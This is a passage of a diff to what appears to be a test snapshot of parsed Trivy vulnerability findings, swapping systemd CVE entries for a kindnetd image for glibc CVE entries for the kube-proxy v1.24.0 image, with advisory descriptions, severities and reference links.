check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-1000654", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00009.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00018.html", + "value": "https://avd.aquasec.com/nvd/cve-2018-20796", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/105151", + "value": "http://www.securityfocus.com/bid/107160", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-1000654", + "value": "https://access.redhat.com/security/cve/CVE-2018-20796", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000654", + "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/issues/4", + "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000654", + "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5352-1", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-1000654", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", }, ], "severity": "LOW", @@ -146004,753 +147565,828 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-3843", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010022", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ - "http://www.securityfocus.com/bid/108116", - "https://access.redhat.com/security/cve/CVE-2019-3843", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", - "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", - "https://linux.oracle.com/cve/CVE-2019-3843.html", - "https://linux.oracle.com/errata/ELSA-2020-1794.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", - "https://security.netapp.com/advisory/ntap-20190619-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-3843", + "https://access.redhat.com/security/cve/CVE-2019-1010022", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "https://ubuntu.com/security/CVE-2019-1010022", + "https://www.cve.org/CVERecord?id=CVE-2019-1010022", ], }, "category": "Vulnerability", - "description": "It was discovered that a systemd service that uses DynamicUser property can create a SUID/SGID binary that would be allowed to run as the transient service UID/GID even after the service is terminated. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the UID/GID will be recycled.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "systemd: services with DynamicUser can create SUID/SGID binaries", + "name": "glibc: stack guard protection bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-3843", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/108116", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-3843", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", + "value": "https://ubuntu.com/security/CVE-2019-1010022", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-3843.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010023", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", + "references": [ + "http://www.securityfocus.com/bid/109167", + "https://access.redhat.com/security/cve/CVE-2019-1010023", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010023", + "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "http://www.securityfocus.com/bid/109167", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://ubuntu.com/security/CVE-2019-1010023", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-3843", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-3844", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010024", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ - "http://www.securityfocus.com/bid/108096", - "https://access.redhat.com/security/cve/CVE-2019-3844", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", - "https://linux.oracle.com/cve/CVE-2019-3844.html", - "https://linux.oracle.com/errata/ELSA-2020-1794.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", - "https://security.netapp.com/advisory/ntap-20190619-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-3844", + "http://www.securityfocus.com/bid/109162", + "https://access.redhat.com/security/cve/CVE-2019-1010024", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010024", + "https://www.cve.org/CVERecord?id=CVE-2019-1010024", ], }, "category": "Vulnerability", - "description": "It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "systemd: services with DynamicUser can get new privileges and create SGID binaries", + "name": "glibc: ASLR bypass using cache of thread stack and heap", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-3844", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/108096", + "value": "http://www.securityfocus.com/bid/109162", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-3844", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-3844.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://ubuntu.com/security/CVE-2019-1010024", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010025", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-1010025", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010025", + "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-3844", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "241-7~deb10u9", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-26604", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-26604", - "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", - "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", - "https://github.com/systemd/systemd/issues/5666", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", - "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", - "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", - "https://security.netapp.com/advisory/ntap-20230505-0009/", - "https://www.cve.org/CVERecord?id=CVE-2023-26604", - ], - }, - "category": "Vulnerability", - "description": "systemd before 247 does not adequately block local privilege escalation for some Sudo configurations, e.g., plausible sudoers files in which the "systemctl status" command may be executed. Specifically, systemd does not set LESSSECURE to 1, and thus other programs may be launched from the less program. This presents a substantial security risk when running systemctl from Sudo, because less executes as root when the terminal size is too small to show the complete systemctl output.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "privilege escalation via the less pager", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-26604", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-26604", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", + "value": "https://ubuntu.com/security/CVE-2019-1010025", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9192", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "references": [ { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/5666", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, { "type": "URL", - "value": "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230505-0009/", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-26604", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "241-7~deb10u8", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33910", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", + "fixedVersion": "2.31-13+deb11u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3999", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", - "https://access.redhat.com/security/cve/CVE-2021-33910", - "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", - "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", - "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", - "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", - "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", - "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", - "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", - "https://linux.oracle.com/cve/CVE-2021-33910.html", - "https://linux.oracle.com/errata/ELSA-2021-2717.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20211104-0008/", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2021-33910", - "https://www.debian.org/security/2021/dsa-4942", - "https://www.openwall.com/lists/oss-security/2021/07/20/2", - "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "https://access.redhat.com/security/cve/CVE-2021-3999", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "https://linux.oracle.com/cve/CVE-2021-3999.html", + "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "https://security.netapp.com/advisory/ntap-20221104-0001/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "https://www.openwall.com/lists/oss-security/2022/01/24/4", ], }, "category": "Vulnerability", - "description": "basic/unit-name.c in systemd prior to 246.15, 247.8, 248.5, and 249.1 has a Memory Allocation with an Excessive Size Value (involving strdupa and alloca for a pathname controlled by a local attacker) that results in an operating system crash.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "systemd: uncontrolled allocation on the stack in function unit_name_path_escape leads to crash", + "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33910", - }, - { - "type": "URL", - "value": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "https://avd.aquasec.com/nvd/cve-2021-3999", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "https://access.redhat.com/security/cve/CVE-2021-3999", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33910", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", + "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", + "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", + "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", + "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33910.html", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-2717.html", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-4756", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", + "references": [ + "http://cxib.net/stuff/glob-0day.c", + "http://securityreason.com/achievement_securityalert/89", + "http://securityreason.com/exploitalert/9223", + "https://access.redhat.com/security/cve/CVE-2010-4756", + "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "https://www.cve.org/CVERecord?id=CVE-2010-4756", + ], + }, + "category": "Vulnerability", + "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", + "value": "https://avd.aquasec.com/nvd/cve-2010-4756", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "http://cxib.net/stuff/glob-0day.c", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211104-0008/", + "value": "http://securityreason.com/achievement_securityalert/89", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "http://securityreason.com/exploitalert/9223", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://access.redhat.com/security/cve/CVE-2010-4756", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33910", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4942", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2021/07/20/2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", }, { "type": "URL", - "value": "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 